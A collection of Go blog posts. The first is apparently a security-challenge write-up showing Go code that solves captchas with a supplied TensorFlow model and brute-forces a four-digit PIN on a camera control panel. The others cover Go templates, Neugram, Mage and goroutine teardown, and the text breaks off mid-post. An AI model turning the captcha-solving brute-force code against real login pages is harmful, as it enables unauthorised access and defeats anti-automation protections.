2017-12-28

This year I helped organize several online security challenges, one of which was Blacklight. Among the things I was asked to do was create a POC for a specific challenge, to prove that it can be solved in a reasonable time. That challenge was one I face occasionally in everyday life, not always with success: breaking a captcha.

The task that requires breaking the captcha is disabling a security camera, so you can break into a room without the camera capturing your face. Here is how it looked before:

A frame from the camera's capture

The provided information was the saved model used for captcha recognition in the binary ProtoBuf format, and a link to the camera control panel.

Being handed a TensorFlow model means doing some TensorFlow!

A Few words about TensorFlow

TensorFlow is an open-source software for Machine Intelligence, used mainly for machine learning applications such as neural networks.

TensorFlow runs computations involving tensors, and there are many sources to understand what a Tensor is. This article is definitely not a sufficient one, and it only holds the bare minimum to make sense of what the code does. Tensors are awesome and complex mathematical objects, and I encourage you to take the time to learn more about them.

For our purposes, here is the explanation from the TensorFlow website:

A tensor is a generalization of vectors and matrices to potentially higher dimensions. Internally, TensorFlow represents tensors as n-dimensional arrays of base datatypes.

A tensor is defined by the data type of the value(s) it holds, and its shape, which is the number of dimensions, and number of values per dimension.
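
As a small illustration, here is a minimal sketch using the Go binding introduced in the next section (the values are made up):

package main

import (
	"fmt"
	"log"

	tf "github.com/tensorflow/tensorflow/tensorflow/go"
)

func main() {
	// A 2x3 slice of float32 becomes a tensor with dtype float32 and shape [2 3].
	t, err := tf.NewTensor([][]float32{{1, 2, 3}, {4, 5, 6}})
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(t.DataType(), t.Shape())
}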

The flow part of TensorFlow describes the fact that the graph (model) is essentially a set of nodes (operations), and the data (tensors) “flows” through those nodes, undergoing mathematical manipulation. You can look at, and evaluate, any node of the graph.

A Few words about TensorFlow+Go

On the official TensorFlow website, you can find a page dedicated to Go, where it says “TensorFlow provides APIs that are particularly well-suited to loading models created in Python and executing them within a Go application.” It also warns that the TensorFlow Go API is not covered by the TensorFlow API stability guarantees. As of the date of this post, it still works as expected.

When going to the package page, there are 2 warnings: 1) The API defined in this package is not stable and can change without notice. 2) The package path is awkward: github.com/tensorflow/tensorflow/tensorflow/go.

In theory, the Go APIs for TensorFlow are powerful enough to do anything you can do from the Python APIs, including training. Here is an example of training a model in Go using a graph written in Python. In practice, some of the tasks, particularly those for model construction, are very low level and certainly not as convenient as doing them in Python. For now, it generally makes sense to define the model in TensorFlow for Python, export it, and then use the Go APIs for inference or training of that model.[1] So while Go might not be your first choice for working with TensorFlow, they do play nice together when using existing models.

Let’s break into this page

The parts of the page I was facing seemed pretty similar to your regular captcha-protected form:

  • PIN Code - brute-force
  • Captcha - use the model

So my TO DOs were:

  • 1. Build a captcha reader
  • 2. While not logged in:
    • 2.1 Generate the next PIN code
    • 2.2 Get captcha text for current captcha image
    • 2.3 Try to log in

SavedModel CLI

From the website: SavedModel is the universal serialization format for TensorFlow models.

So our first step would be figuring out the input and output nodes of the prediction workflow. SavedModel CLI is an inspector for doing this. Here’s the command and its output:

$ saved_model_cli show --dir <PATH> --all


MetaGraphDef with tag-set: 'serve' contains the following SignatureDefs:

signature_def['serving_default']:
The given SavedModel SignatureDef contains the following input(s):
inputs['input'] tensor_info:
    dtype: DT_STRING
    shape: unknown_rank
    name: CAPTCHA/input_image_as_bytes:0
The given SavedModel SignatureDef contains the following output(s):
outputs['output'] tensor_info:
    dtype: DT_STRING
    shape: unknown_rank
    name: CAPTCHA/prediction:0
Method name is: tensorflow/serving/predict

What we learn from this are the node names.

Input node: CAPTCHA/input_image_as_bytes,

Output node: CAPTCHA/prediction.

Captcha

Now let’s load the model, using func LoadSavedModel(exportDir string, tags []string, options *SessionOptions) (*SavedModel, error). The function takes 3 arguments: path, tags and session options. Explaining tags and options could easily take the entire post and would shift the focus, so for our purpose I used the convention {"serve"}, and provided no session options.

	savedModel, err := tf.LoadSavedModel("./tensorflow_savedmodel_captcha", []string{"serve"}, nil)
	if err != nil {
		log.Println("failed to load model", err)
		return
	}

Then get the captcha from the web page, and run it through the model. First, define the output of an operation in the graph (model+node) and its index.

	feedsOutput := tf.Output{
		Op:    savedModel.Graph.Operation("CAPTCHA/input_image_as_bytes"),
		Index: 0,
	}
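
The next snippet reads the captcha image out of a bytes.Buffer named buf. The post doesn’t show how buf is filled; a minimal sketch, assuming a hypothetical /captcha image path on the same site and the cookie-jar-backed http.Client set up later in the post, could look like this:

// Hypothetical helper: download the current captcha image into a buffer.
// The "/captcha" path is an assumption, not taken from the challenge site.
func fetchCaptcha(client *http.Client, siteUrl string) (*bytes.Buffer, error) {
	res, err := client.Get(siteUrl + "/captcha")
	if err != nil {
		return nil, err
	}
	defer res.Body.Close()

	buf := new(bytes.Buffer)
	if _, err := buf.ReadFrom(res.Body); err != nil {
		return nil, err
	}
	return buf, nil
}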

Create a new tensor. The input can be a scalar, a slice, or an array. As we want to predict a captcha, we’ll need 1 dimension with 1 element, of type string.

	feedsTensor, err := tf.NewTensor(string(buf.String()))
	if err != nil {
		log.Fatal(err)
	}

Set up a map from the input operation to the tensor that will be fed to it.

	feeds := map[tf.Output]*tf.Tensor{feedsOutput: feedsTensor}

Get the output from the prediction operation into this output struct.

	fetches := []tf.Output{
		{
			Op:    savedModel.Graph.Operation("CAPTCHA/prediction"),
			Index: 0,
		},
	}

Run the data through the graph and receive the output - the captcha prediction.

	captchaText, err := savedModel.Session.Run(feeds, fetches, nil)
	if err != nil {
		log.Fatal(err)
	}
	captchaString := captchaText[0].Value().(string)

Here is how this looks:

The captcha screenshot

Generate a PIN code

The PIN code is made of 4 digits, so we’ll go over all the combinations. Each iteration also needs the saved model for the prediction operation, and of course some logging.

	for x := 0; x < 10000; x++ {
		logIntoSite(fmt.Sprintf("%0.4d", x), savedModel, *printLogs)
	}

Try to log in

Once all values are there - the current value of the PIN code in the loop and the captcha prediction - let’s POST that request to the login page.

	params := url.Values{}
	params.Set("pin", pinAttempt)
	params.Set("captcha", captchaString)

	res, err := client.PostForm(string(siteUrl+"/disable"), params)
	if err != nil {
		log.Fatal(err)
	}

	defer res.Body.Close()
	buf = new(bytes.Buffer)
	buf.ReadFrom(res.Body)
	response := buf.String()

If the captcha prediction failed, run the prediction again, and retry with the same PIN code.

	if parseResponse(response, pinAttempt, captchaString, printLogs) == badCaptcha {
		logIntoSite(pinAttempt, savedModel, printLogs)
	}

The parseResponse function checks and reports whether the website response is a success or one of the failure messages, which I found by manually trying combinations of PIN code guesses with correct and wrong captcha translations.

func parseResponse(response, pinAttempt, captchaString string, printLogs bool) string {
	message := "something happened"
	if strings.Contains(response, badPIN) {
		message = badPIN
	} else if strings.Contains(response, badCaptcha) {
		message = badCaptcha
	}

	logResponse(printLogs, message, pinAttempt, captchaString, response)
	return message
}

The rest of the code

To complete this code, let’s add everyone’s favorites: cookies and logging. Generating the captcha starts a new session, and in order to use the predicted captcha in the same session, we will open a cookie jar. Even though it’s the first time I am writing about cookies publicly, I will spare you the cookie jokes, as part of the Christmas spirit.

	jar, err := cookiejar.New(nil)
	if err != nil {
		log.Fatal(err)
	}
	client := &http.Client{
		Jar: jar,
	}

And here is how it looks when it’s all composed together.

To wrap this up

TensorFlow has many great models which can be used with Go. Here is a great list of those.

Online challenges can be an awesome way to learn, whether it’s coding, security or sports. The combination of putting in practice your knowledge and having a mission creates a fun environment where you can work on improving your skills. Consider joining such a challenge as your new year’s resolution.

Thanks a lot to Ed for reviewing this PR. Also thanks to Asim Ahankar from the TensorFlow team for pointing out it is possible to train models with Go, as updated in [1]. We will collaborate further to make the documentation around this more accessible.

If you want to chat more about this, tweet me, or meet me at Gophercon Iceland!

2017-12-27
It is a real struggle to work with a new language, especially if its type system doesn’t resemble what you have previously seen. I have been there with Go: I lost interest in the language when it first came out because I pretended it was something I already knew. Go is considered an object-oriented language even though it lacks type hierarchy. It has an unconventional type system.
2017-12-27

Go templates are a powerful method to customize output however you want, whether you’re creating a web page, sending an e-mail, working with Buffalo, Go-Hugo, or just using some CLI such as kubectl.

There are two packages for working with templates — text/template and html/template. Both provide the same interface; however, the html/template package generates HTML output that is safe against code injection.

In this article we’re going to take a quick look at how to use these packages, as well as how to integrate them with your application.

Actions

Before we learn how to implement templates, let’s take a look at the template syntax. Templates are provided to the appropriate functions either as a string or as a “raw string”. Actions represent data evaluations, functions or control loops. They’re delimited by {{ }}. Other, non-delimited parts are left untouched.

Data evaluations

Usually, when using templates, you’ll bind them to some data structure (e.g. a struct) from which you’ll obtain data. To obtain data from a struct, you can use the {{ .FieldName }} action, which will be replaced with the FieldName value of the given struct when the template is executed. The struct is given to the Execute function, which we’ll cover later.

There’s also the {{.}} action that you can use to refer to a value of non-struct types.

Conditions

You can also use if conditions in templates. For example, you can check whether FieldName is non-empty, and if it is, print its value: {{if .FieldName}} Value of FieldName is {{ .FieldName }} {{end}}.

else and else if are also supported: {{if .FieldName}} // action {{ else }} // action 2 {{ end }}.

Loops

Using the range action you can loop through a slice. A range action is defined using the {{range .Member}} ... {{end}} template.

If your slice is a non-struct type, you can refer to the value using the {{ . }} action. In case of structs, you can refer to the value using the {{ .Member }} action, as already explained.
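
As a quick, self-contained sketch (the slice contents are made up), ranging over a plain []string looks like this:

package main

import (
	"os"
	"text/template"
)

func main() {
	// {{range .}} iterates over the slice; inside the loop, {{.}} is the current element.
	t, err := template.New("list").Parse("{{range .}}- {{.}}\n{{end}}")
	if err != nil {
		panic(err)
	}
	if err := t.Execute(os.Stdout, []string{"write article", "review code"}); err != nil {
		panic(err)
	}
}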

Functions, Pipelines and Variables

Actions have several built-in functions that are used along with pipelines to additionally process output. Pipelines are annotated with | and the default behavior is to send the data from the left side to the function on the right side.

Functions are used to escape the action’s result. There are several functions available by default, such as html, which returns HTML-escaped output safe against code injection, or js, which returns JavaScript-escaped output.

Using the with action, you can define variables that are available in that with block: {{ with $x := result-of-some-action }} {{ $x }} {{ end }}.
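
Here is a small, self-contained sketch combining a with block, a variable and the built-in html function in a pipeline (the input string is made up):

package main

import (
	"os"
	"text/template"
)

func main() {
	// $x is only visible inside the with block; the html function escapes its input.
	t, err := template.New("esc").Parse(`{{ with $x := . }}{{ $x | html }}{{ end }}`)
	if err != nil {
		panic(err)
	}
	// Prints: &lt;script&gt;alert(1)&lt;/script&gt;
	if err := t.Execute(os.Stdout, "<script>alert(1)</script>"); err != nil {
		panic(err)
	}
}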

Throughout the article, we’re going to cover more complex actions, such as reading from an array instead of a struct.

Parsing Templates

The three most important and most frequently used functions are:

  • New — allocates a new, undefined template,
  • Parse — parses the given template string and returns the parsed template,
  • Execute — applies the parsed template to the data structure and writes the result to the given writer.

The following code shows the above-mentioned functions in action:

package main

import (
	"os"
	"text/template"
)

type Todo struct {
	Name        string
	Description string
}

func main() {
	td := Todo{"Test templates", "Let's test a template to see the magic."}

	t, err := template.New("todos").Parse("You have a task named \"{{ .Name}}\" with description: \"{{ .Description}}\"")
	if err != nil {
		panic(err)
	}
	err = t.Execute(os.Stdout, td)
	if err != nil {
		panic(err)
	}
}

The result is the following message printed in your terminal:

You have a task named "Test templates" with description: "Let's test a template to see the magic."

You can reuse the same template, without needing to create or parse it again by providing the struct you want to use to the Execute function again:

// code omitted for brevity
...

tdNew := Todo{"Go", "Contribute to any Go project"}
err = t.Execute(os.Stdout, tdNew)
}

The result is like the previous one, just with new data:

You have a task named "Go" with description: "Contribute to any Go project"

As you can see, templates provide a powerful way to customize textual output. Besides manipulating textual output, you can also manipulate HTML output using the html/template package.

Verifying Templates

The template packages provide the Must function, used to verify that a template is valid during parsing. It provides the same result as manually checking for the error, like in the previous example.

This approach saves you typing, but if you encounter an error, your application will panic. For advanced error handling, it’s easier to use the previous solution instead of the Must function.

The Must function takes a template and an error as arguments. It’s common to pass it a New(...).Parse(...) call directly:

t := template.Must(template.New("todos").Parse("You have task named \"{{ .Name}}\" with description: \"{{ .Description}}\""))

Throughout the article we’re going to use this function so we can omit explicit error checking.

Once we know what the template packages provide, we can use them in our application. The next section of the article covers some practical use cases, such as creating web pages, sending e-mails or integrating templates with your CLI.

Implementing Templates

In this part of the article we’re going to take a look at how you can use the magic of templates. Let’s create a simple HTML page containing a to-do list.

Creating Web Pages using Templates

The html/template package allows you to provide a template file, e.g. an HTML file, to make implementing both the front-end and the back-end easier.

The following data structure represents a To-Do list. The root element has the user’s name and the list, which is represented as a slice of structs containing each task’s name and status.

type entry struct {
  Name string
  Done bool
}

type ToDo struct {
  User string
  List []entry
}

This simple HTML page will be used to display the user’s name and their To-Do list. For this example, we’re going to use the range action to loop through the tasks slice, the with action to get data from the slice more easily, and a condition checking whether a task is already done. If the task is done, Yes will be written in the appropriate field; otherwise, No will be written.

<!DOCTYPE html>
<html>
  <head>
    <title>Go To-Do list</title>
  </head>
  <body>
    <p>
      To-Do list for user: {{ .User }} 
    </p>
    <table>
      	<tr>
          <td>Task</td>
          <td>Done</td>
    	</tr>
      	{{ with .List }}
			{{ range . }}
      			<tr>
              		<td>{{ .Name }}</td>
              		<td>{{ if .Done }}Yes{{ else }}No{{ end }}</td>
      			</tr>
			{{ end }} 
      	{{ end }}
    </table>
  </body>
</html>

Just like earlier, we’re going to parse the template and then apply it to the struct containing our data. Instead of the Parse function, ParseFiles is going to be used. Also, for brevity, we’ll write the executed template to standard output (your terminal) instead of to an http.ResponseWriter.

package main

import (
	"html/template"
	"os"
)

type entry struct {
	Name string
	Done bool
}

type ToDo struct {
	User string
	List []entry
}

func main() {
	// Parse data -- omitted for brevity

	// Files are provided as a slice of strings.
	paths := []string{
		"todo.tmpl",
	}

	t := template.Must(template.New("html-tmpl").ParseFiles(paths...))
	err = t.Execute(os.Stdout, todos)
	if err != nil {
		panic(err)
	}
}

This time, we’re using html/template instead of text/template, but as they provide the same interface, we’re using the same functions to parse the template. The output would be the same even if you used text/template, but this output is safe against code injection.

This code generates output such as the following:

<!DOCTYPE html>
<html>
  <head>
    <title>Go To-Do list</title>
  </head>
  <body>
    <p>
      To-Do list for user: gopher 
    </p>
    <table>
      	<tr>
          <td>Task</td>
          <td>Done</td>
    	</tr>
      			<tr>
              		<td>GopherAcademy Article</td>
              		<td>Yes</td>
      			</tr>			
      			<tr>
              		<td>Merge PRs</td>
              		<td>No</td>
      			</tr>
    </table>
  </body>
</html>

Parsing Multiple Files

Sometimes this approach is not suitable: for example, if you have many files, or you’re dynamically adding new ones and removing old ones.

Besides the ParseFiles function, there’s also the ParseGlob function, which takes a glob pattern as an argument and then parses all files that match the glob.

// ...
t := template.Must(template.New("html-tmpl").ParseGlob("*.tmpl"))
err = t.Execute(os.Stdout, todos)
if err != nil {
	panic(err)
}
// ...

Use cases
  • You can use this approach to generate a web page that obtains data using Go API.
  • You can generate and send e-mails.
  • You can create wonderful web sites using Go Hugo templating.

Customizing Command’s Output

You can incorporate templates in your CLI, allowing users to customize a command’s output. This is commonly done by providing flags for inputting templates. For example, the Kubernetes CLI—kubectl provides two flags, --template for providing a template as a string and --template-file used to provide a template in the form of a file.

The following snippet parses the template provided via one of the two flags—template and template-file.

package main

import (
	"flag"
	"os"
	"text/template"
)

func main() {
	// data parsing...

	// Note: the flag variables must not be named "template", as that would
	// shadow the imported template package.
	var tmpl, tmplFile string
	flag.StringVar(&tmpl, "template", "", "a template")
	flag.StringVar(&tmplFile, "template-file", "", "a template file path")
	flag.Parse()

	if tmplFile != "" {
		paths := []string{tmplFile}
		t := template.Must(template.New("html-tmpl").ParseFiles(paths...))
		err := t.Execute(os.Stdout, todos)
		if err != nil {
			panic(err)
		}
	} else if tmpl != "" {
		t := template.Must(template.New("html-tmpl").Parse(tmpl))
		err := t.Execute(os.Stdout, todos)
		if err != nil {
			panic(err)
		}
	} else {
		// non-template data logic...
	}
}

Something similar could be done using spf13/cobra. This code snippet omits data parsing logic for brevity. Users can use this to customize output using an intuitive template language, without needing to resort to tools such as sed, awk or grep.

Conclusion

In this article we showed how to use basic templating functions to manipulate data, along with several use cases. This article is meant to be a quick reference to Go’s template packages. You can also check out the official text/template and html/template documentation if you’re interested in more complex use cases.

If you have any questions, feel free to contact me! You can find me as xmudrii on Gophers Slack, Twitter and GitHub.

2017-12-26

Neugram is a scripting language that sticks very close to Go. Go statements are Neugram statements, you can import Go packages, scripts can be compiled to Go programs, and types look just like the equivalent Go types at run time (which means packages built on reflection, like fmt, work as expected). These requirements put a lot of restrictions on the design of Neugram. This post is about one such restriction on methods that I did not discover until I tried to use it without thinking.

Background: Go without declarations

When designing a language for use in a REPL (a read-eval-print-loop like your shell), you want to be able to dive right in and have code executed as quickly as possible. That is, a scripting language should be able to say "Hello, World!" in one reasonable line.

Popular scripting languages like Perl and Python use statements as the topmost grammatical construction. A simple statement can consist of a single expression, like the command to print a string.

Go is different. The topmost grammatical construction in Go is a declaration. Declarations consist of package-wide constants, variables, functions, types and methods. Inside declarations are statements. Statements are in charge of program control flow and contain some number of expressions. An expression is an actual computation, where we do the work of programming.

The concept of having a layer of declarations above statements is common in programming languages. Both C and Java have declarations. Declarations are useful. The order of top-level declarations in Go does not affect the order of execution of the program. This makes it possible to depend on names defined later in the file (or in an entirely different file in the package) without developing a system of forward declarations or header files.
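
For example, the following is valid Go (names are made up) even though greet is declared after the point where it is called:

package main

import "fmt"

// main can call greet even though greet is declared later in the file:
// the order of top-level declarations does not matter.
func main() {
	fmt.Println(greet())
}

func greet() string { return "Hello, World!" }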

One of the key changes that makes Neugram a different language from Go is we do not have top-level declarations. Neugram starts with statements. We lose the advantages of declarations in exchange for executing statements quickly.

Without declarations, packages are restricted to a single file (to avoid thinking about order of file execution) and referring to names not yet defined is tricky, but the feel of many programs stays the same because in Go most declarations also work as statements. For example:

var V = 4
type T int

Method grammar

The one top-level declaration that we miss in Neugram is the method declaration. In Go you declare a method by writing:

func (t T) String() string {
	return fmt.Sprintf("%d", int(t))
}

Critically, this declaration does not stand on its own. You need another declaration somewhere in your package defining the type T. While type declarations can be made as statements, method declarations cannot. There are several possible arguments for why not, but given the current syntax one is that it would introduce the notion of incomplete types to the run time phase of Go programs. Imagine:

func main() {
	type T int
	var t interface{} = T(0)

	_, isReader := t.(io.Reader)
	fmt.Println(isReader) // prints false

	if rand {
		func (t T) Read([]byte) (int, error) {
			return 0, io.EOF
		}
	}

	_, isReader = t.(io.Reader)
	fmt.Println(isReader) // prints ... what?
}

Method declarations in Go break the complete definition of a type out over many top-level declarations. This works in Go because there is no concept of time for declarations, they all happen simultaneously before a program is run. This won’t work in Neugram where all declarations have to be made inside statements that happen during program execution.

Methodik

To resolve this, Neugram introduces a new keyword, methodik, to define a type with all of its methods in a single statement.

methodik T int {
	func (t) Read([]byte) (int, error) {
		return 0, io.EOF
	}
}

This statement is evaluated in one step. The type T does not exist beforehand, and after the statement is evaluated it exists with all of its methods.

So far so good.

Method closures: You can’t do that in Go

While testing out method declarations, I attempted to reimplement io.LimitReader. The version I came up with didn’t work:

func limit(r io.Reader, n int) io.Reader {
	methodik lr struct{} {
		func (*l) Read(p []byte) (int, error) {
			if n <= 0 {
				return 0, io.EOF
			}
			if len(p) > n {
				p = p[:n]
			}
			rn, err := r.Read(p)
			n -= rn
			return rn, err
		}
	}
	return &lr{}
}

Why not? Using the values r and n in a closure is normal Go programming, but this is something unusual: I am trying to construct a method closure.

An implication of methods only being definable by top-level declaration in Go is that there is no closure equivalent form. There is also no way (presently, issue #16522 may make it possible) to create a method using reflection which would allow closing over variables.

This is not a particularly problematic limitation; we can move the free variables of the closure explicitly into the type being defined to get the same effect:

func limit(r io.Reader, n int) io.Reader {
	methodik lr struct{
		R io.Reader
		N int
	} {
		func (*l) Read(p []byte) (int, error) {
			if l.N <= 0 {
				return 0, io.EOF
			}
			if len(p) > l.N {
				p = p[:l.N]
			}
			rn, err := l.R.Read(p)
			l.N -= rn
			return rn, err
		}
	}
	return &lr{r, n}
}

Avoiding method closures also avoids some reflection surprises: two different lr types, defined as closing over different values, would probably have to be different types. That means run time creation of new types without the use of the reflect package, which is a category of possibilities I’m glad I don’t have to imagine.

The restriction itself however could be confusing for someone new to Neugram who doesn’t know about the limits of Go underlying it. In particular, consider the interaction with global variables. It is fine for a method defined in Go to refer to globals, and so too in Neugram:

var x = "hello" // a global

methodik obj struct{} {
	func (o) String() string {
		return x // this is fine
	}
}

However if we take this code and try to indent it into a block, the type checker will now have to produce an error, because x is no longer a global variable. This is unfortunate. In Go there is a clear distinction between global (defined by top-level declarations) and non-global variables (defined by statements). In Neugram they look similar, so this is one more thing the programmer has to track themselves.

Surprising expressivity

Accidentally introducing syntax for method closures is a good example of the kind of problem I have spent a lot of time trying to avoid in Neugram. Even the smallest changes to Go result in unexpected ways to write programs. I did not find this particular problem until months after creating the methodik syntax.

2017-12-25

Many Go projects can be built using only Go’s wonderful built-in tooling. However, for many projects, these commands may not be sufficient. Maybe you want to use ldflags during the build to embed the commit hash in the binary. Maybe you want to embed some files into the binary. Maybe you want to generate some code. Maybe you want to run a half dozen different linters. That’s where a build tool comes into play.

I used to propose using a normal go file to be run with go run. However, then you’re stuck building out a lot of the CLI handling yourself, which is busy work… no one wants to write another CLI parser for their project, plus error handling, plus handling output etc.

You might consider make, which handles the CLI definition for you, but then you’re stuck with writing Bash. A few months ago, I decided that neither of these build tool options were sufficient, and decided to make a third way. Thus, Mage was born. Mage is a build tool similar to make or rake, but instead of writing bash or ruby, Mage lets you write the logic in Go.

There are many reasons to choose Mage over make. The most important is the language. By definition, the contributors to your Go project already know Go. For many of them, it may be the language they’re most comfortable with. Your build system is just as important as the thing it’s building, so why not make it just as easy to contribute to? Why have a second language in your repo if you can easily avoid it? Not only is bash an esoteric language to start with, make piles even more arcane syntax on top of bash. Now you’re maintaining effectively three different languages in your repo.

One thing I love about Go is how easy it is to make cross platform applications. This is where Mage really shines. Although make is installed by default on Linux and OSX, it is not installed by default on Windows (which, as Stack Overflow notes, is the most prevalent development OS). Even if you install make on Windows, now you have to get bash running, which is non-trivial (yes, you can install the Windows Subsystem for Linux, but now you’re up to a pretty big ask just to build your Go project).

Mage, on the other hand, is a plain old Go application. If you have Go installed (and I presume you do) you can simply go get github.com/magefile/mage. Mage has no dependencies outside the standard library, so you don’t even have to worry about a dependency manager for it. You can also download prebuilt binaries from github, if that’s preferable.

Once Mage is installed, you use Mage much like make in that you write one or more scripts (in this case, normal go files that we call magefiles) which mage then builds and runs for you. A magefile, instead of having a magic name (like Makefile), uses the go build tag //+build mage to indicate that mage should read it. Other than that, there’s nothing special about magefiles and you can name them whatever you like.

Mage includes all files that have this tag and only files that have this tag in its builds. This has several nice benefits - you can have the code for your build spread across any number of files, and those files will be ignored by the rest of your build commands. In addition, if you have platform-specific build code, you can use go’s build tags to ensure those are included or excluded as per usual. All your existing Go editor integrations, linters, and command line tools work with magefiles just like normal go files, because they are normal go files. Anything you can do with Go, any libraries you want to use, you can use with Mage.
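
As a small sketch of that (the target name and the file split are made up), a Windows-only magefile just stacks the regular platform tag on top of the mage tag:

//+build mage
//+build windows

package main

// Hypothetical Windows-only target kept in its own file; the usual go build
// tag rules decide whether it gets compiled into the generated mage binary.
func Installer() error {
	// windows-specific packaging steps would go here
	return nil
}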

Just like make, Mage uses build targets as CLI commands. For Mage, these targets are simply exported functions that may optionally take a context.Context and may optionally return an error. Any such function is exposed to Mage as a build target. Targets in a magefile are run just like in make:

//+build mage

package main

// Creates the binary in the current directory.  It will overwrite any existing
// binary.
func Build() {
    print("building!")
}

// Sends the binary to the server.
func Deploy() error {
    return nil
}

Running mage in the directory with the above file will list the targets:

$ mage
Targets:
  build    Creates the binary in the current directory.
  deploy   Sends the binary to the server

Mage handles errors returned from targets just like you’d hope, printing errors to stderr and exiting with a non-zero exit code. Dependent targets, just like in make, will be run exactly once, starting at the leaves and moving upward through a dynamically generated dependency tree.
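
Those dependencies are declared in Go too; here’s a minimal sketch using the mg helper package that ships with Mage (reusing the Build target from above):

//+build mage

package main

import "github.com/magefile/mage/mg"

// Creates the binary in the current directory.
func Build() {
	print("building!")
}

// Sends the binary to the server. mg.Deps ensures Build runs first,
// and exactly once, no matter how many targets depend on it.
func Deploy() error {
	mg.Deps(Build)
	return nil
}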

Mage has a ton of features - running multiple targets, default targets, target aliases, file targets and sources, shell helpers, and more. However, for this blog post I want to dive more into some of the magic behind how Mage works, not just what it does.

How it Works

When you run mage, the first thing it has to do is figure out what files it should read. It uses the normal go build heuristics (build tags, _platform in filenames, etc) with one little tweak… normally when you build, go grabs all files in a directory without tags. If you specify a tag in the build command it adds any files with that build tag… but it never takes away the files with no build tags. This won’t work for mage, since I wanted it to only include files that had a specific tag. This required some hacking. I ended up copying the entire go/build package into Mage’s repo and inserting some custom code to add the idea of a required tag… which then excludes any files that don’t explicitly specify that tag.

Once that step is done, we have a list of files with the correct build tags. Now, what to do with them? Well, we need to be able to execute the functions inside them. To do that, we need to generate some glue code to call the functions, and build the whole thing into a binary. Since this process can be time consuming the first time it’s run (on the order of 0.3 seconds on my 2017 MBP), we cache the created binary on disk whenever it’s built. Thus, after the first time it’s run, running mage for a project will start instantly like any normal Go binary (on my machine about 0.01s to print out help, for example). To ensure the cached binary exactly matches the code from the magefiles, we hash the input files and some data from the mage binary itself. If a cached version matches the hash (we just use the hash as the filename), we run that, since we know it must have been built using the exact same code.

If there’s no matching binary in the cache, we need to actually do some work. We parse the magefiles using go/types to figure out what our targets are and to look for a few other features (like if there’s a default target and if there’s any aliases). Parsing produces a struct of metadata about the binary, which is then fed into a normal go template which generates the func main() and all the code that produces the help output, the code to determine what target(s) to call, and the error handling.

This generated code is written to a file in the current directory and then it and the magefiles are run through a normal execution of go build to produce the binary, then the temp file is cleaned up.

Now that the glue code and magefiles have been compiled, it’s just a matter of running the binary and passing through the arguments sent to mage (this is the only thing that happens when the binary is cached).

From there, it’s just your go code running, same as always. No surprises, no wacky syntax. The Go we all know and love, working for you and the people on your team.

If you want some examples of magefiles, you can check out ones used by Gnorm, Hugo, and hopefully soon, dep.

Hop on the #mage channel on gopher slack to get all your questions answered, and feel free to take a look at our current issue list and pick up something to hack on.

2017-12-24

I stumbled over this idiom for managing goroutine lifecycles when I was writing OK Log. Since then I’ve found uses for it in nearly every program I’ve written. I thought it’d be nice to share it.

Motivation

My programs tend to have the same structure: they’re built as a set of inter-dependent, concurrent components, each responsible for a distinct bit of behavior. All of these components tend to be modeled in the same way, more or less: whether implemented as structs with methods or free functions, they’re all things that are running: doing stuff, responding to events, changing state, talking to other things, and so on. And when I write programs, in the style of a large func main with explicit dependencies, I generally construct all of the dependencies from the leaves of the dependency tree, gradually working my way up to the higher-order components, and then eventually to the specific things that I want to run.

In this example, I have a state machine, an HTTP server serving an API, some stream processor feeding input to the state machine, and a ctrl-C signal handler.

ctx, cancel := context.WithCancel(context.Background())
defer cancel()

sm := newStateMachine()
go sm.Run(ctx)

api := newAPI(sm)
go http.ListenAndServe(":8080", api)

r := getStreamReader()
go processStream(r, sm)

signalHandler() // maybe we wait for this one to return

We have this setup phase in our func main, where we set up a context. We set up all of the common dependencies, like the logger. And then, we make all of the components, in the order dictated by their dependency relationships. Our state machine has an explicit Run method, which we go to get it started. Our HTTP API needs to have its handler served in its own go routine. Our stream processor is modeled as a function, taking the input stream and state machine as dependencies, which we also go in the background. And our ctrl-C handler also needs to be running, waiting for its signal.

I think this is the best way to structure object graphs and dependencies in Go programs, and I’ve written at length about it before. But there’s some trickiness in the details here. We know that we must never start a goroutine without knowing how it will stop. But how do we actually do this, in a way that’s both intuitive enough for new maintainers to easily grok and extend, and flexible enough to handle the nontrivial use cases we have here?

To me, the complication hinges not on how to start the goroutines, or handle communication between them, but on how to deterministically tear them down. Returning to our example, let’s consider how each of the components might be stopped.

The state machine is clear: since it takes a context.Context, presumably it will return when the context is canceled.

sm := newStateMachine()
go sm.Run(ctx) // stopped via cancel()

But the HTTP server presents a problem: as written, there’s no way to interrupt it. So we need to change it slightly. It turns out http.ListenAndServe is just a small helper function, which combines two things: first binding the listener, and then attaching and running the server. If we do those two steps explicitly ourselves, we get access to the net.Listener, which has a Close method that, when invoked, will trigger the server to return. Or, better still: we can leverage the graceful shutdown functionality added to http.Server in 1.8.

api := newAPI(sm)
server := http.Server{Handler: api}
ln, _ := net.Listen("tcp", ":8080")
server.Serve(ln) // shutdown via server.Shutdown()

In this demonstrative example, we’ll say that the stream processor returns when its stream io.Reader is exhausted. But as written, there’s no way to trigger an e.g. io.EOF on a plain io.Reader. Instead, we’d need to wrap it into an io.ReadCloser, and provide a way to close the stream pre-emptively. Or, perhaps better, the concrete type that implements io.Reader, for example a net.Conn, may also have a Close method that could work.

// r := getStreamReader()
rc := getStreamReadCloser()
go streamProcessor(rc, sm) // stopped via rc.Close()

Finally, the ctrl-C handler also has no way to be interrupted as written. But since it’s our own code, we’re presumably free to modify it to add an interrupt mechanism. I like using a cancel chan for this kind of basic stuff: less surface area than context.Context.

stop := make(chan struct{})
signalHandler(stop) // returns via close(stop) (or ctrl-C)
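
The post doesn’t show signalHandler itself; a hypothetical version consistent with the snippet above, built on os/signal, might look like this:

// Returns when ctrl-C (SIGINT) is received or when the stop channel is closed.
func signalHandler(stop chan struct{}) error {
	c := make(chan os.Signal, 1)
	signal.Notify(c, os.Interrupt)
	select {
	case sig := <-c:
		return fmt.Errorf("received signal %v", sig)
	case <-stop:
		return errors.New("stopped")
	}
}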

Look at all the different ways we have to terminate goroutines. I think the only commonality between them is that they’re expressions, or blocks of Go code. And I think anything that manages goroutine lifecycles needs to accommodate this heterogeneity. If we embrace that constraint, and try to design an API around it, what falls out?

run.Group

My guess at an answer is package run, and the run.Group. From the package documentation:

Package run implements an actor-runner with deterministic teardown. It is somewhat similar to package errgroup, except it does not require actor goroutines to understand context semantics. This makes it suitable for use in more circumstances; for example, goroutines which are handling connections from net.Listeners, or scanning input from a closable io.Reader.

With package run and the run.Group, we model each running goroutine as a pair of functions, defined inline. The first function, called the execute function, is launched as a new goroutine. The second function, called the interrupt function, must interrupt the execute function and cause it to return.

Here’s the documentation:

